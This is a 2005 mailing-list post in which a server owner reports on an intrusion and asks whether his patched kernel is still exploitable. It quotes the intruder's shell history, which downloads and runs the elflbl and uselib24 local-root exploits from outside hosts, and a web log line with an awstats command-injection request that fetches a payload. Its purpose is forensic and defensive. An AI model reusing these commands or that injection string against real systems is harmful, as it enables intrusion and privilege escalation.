 | | | Patched kernel still vulnerable!? (was Re: Hacked...) | Patched kernel still vulnerable!? (was Re: Hacked...) 2005-03-09 - By Aviram Carmi
Back
Hi all,
As I was tracking down what happened to my machine, I followed up and
researched the first few commands that were in the .bash_history:
cd /var/tmp
wget http://www.albany-toyota.co.nz/release/elflbl
chmod 777 elflbl
./elflbl
id
./elflbl -n3
id
./elflbl -f switch
id
wget http://www.freewebs.com/swcbreaker/xpl/uselib24
chmod 777 uselib24
./uselib24
From what I was able to find, elflbl exploits a vulnerability in
uselib which was supposedly fixed in Jan 17, and which I installed on
Jan 20. first traces of the breakin were in Feb 12 (even though the
log file shows awstats hacked on Mar 5???)
https://rhn.redhat.com/network/errata/details/index.pxt?eid=2656
> RHSA-2005:043 - Security Advisory
>
> * Details
> * Packages
> * Affected Systems
>
> Synopsis
> Updated kernel packages fix security vulnerabilities
>
> Issued: 2005-01-17
> Updated: 2005-01-17
> Topic
> Updated kernel packages that fix several security issues in Red Hat
> Enterprise Linux 3 are now available.
> Description
> The Linux kernel handles the basic functions of the operating system.
>
> This advisory includes fixes for several security issues:
>
> iSEC Security Research discovered a VMA handling flaw in the uselib(2)
> system call of the Linux kernel. A local user could make use of this
> flaw to gain elevated (root) privileges. The Common Vulnerabilities and
> Exposures project (cve.mitre.org) has assigned the name CAN-2004-1235 to
> this issue.
So... is there still a security hole in the kernel that elflbl exploits?
I have a copy of the elflbl executable (and of the uselib24) if they
are not available from the above URLs.
BTW,
I installed mod_security http://www.modsecurity.org/ with rules from
http://www.gotroot.com/mod_security+rules
and upgraded awsatats to the latest version...
and as I mentioned previously wget, curl, lynx, telnet are all
aliased to to this little shell script (the originals renamed so I
can use them in my scripts)
{ echo $0 $* ; echo ps; ps -egxuwc; echo who; who -aH; echo set;
set; echo ; } | mail -s $0 myemail@(protected)
so that I am informed of any unauthorized used of wget/curl/lynx/telnet
I still do not have a firewall configured, since I am still not quite
sure how to allow needed services, for example, I have a backup
client program (Dantz Retrospect), and a FileMaker Pro server,
running on the system, which use their well known ports, but when
doing lsof it show that there are other ports in use by these, so I
am not sure exactly how to do this... I've asked before, and got some
answers, but did not really follow up and install/configure the
firewall...
-avi
At 22:45 -0800 03/08/2005, Aviram Carmi wrote:
> Thanks,
>
> it was awstats:
>
> 200.175.36.178 - - [05/Mar/2005:19:48:35 -0800] "GET
> /awstats//awstats.pl?configdir=|echo%20;echo%20__comeco__;%20cd%20/var/tmp;
%20%20wget%20http://paginas.terra.com.br/informatica/swcrew/r0nin%20;echo%20_
_fim__;echo%20|
> HTTP/1.1" 200 598 "-" "-"
>
>
> -avi
>
>
>
> At 00:28 -0600 03/09/2005, Thomas Cameron wrote:
>> Look in /var/log/http/*. I am betting that there is something in
>> one of the logs (probably error_log) that will catch your eye.
>>
>> You're running something PHP-ish, aren;t you? Or maybe awstats?
>>
>> Thomas
--
Aviram Carmi
Owner
Executive Vice President, Technology
Over TheNet (R)
601 Daily Drive Suite #226
Camarillo, CA 93010-5840
http://www.otn.com/ Building Profitable Web Sites Today
(805) 384-1144 Voice (805) 384-9111 FAX
(C) Copyright 2004, Over TheNet (R) All rights reserved.
--
Taroon-list mailing list
Taroon-list@(protected)
http://www.redhat.com/mailman/listinfo/taroon-list
Earn $52 per hosting referral at Lunarpages.
|
|
|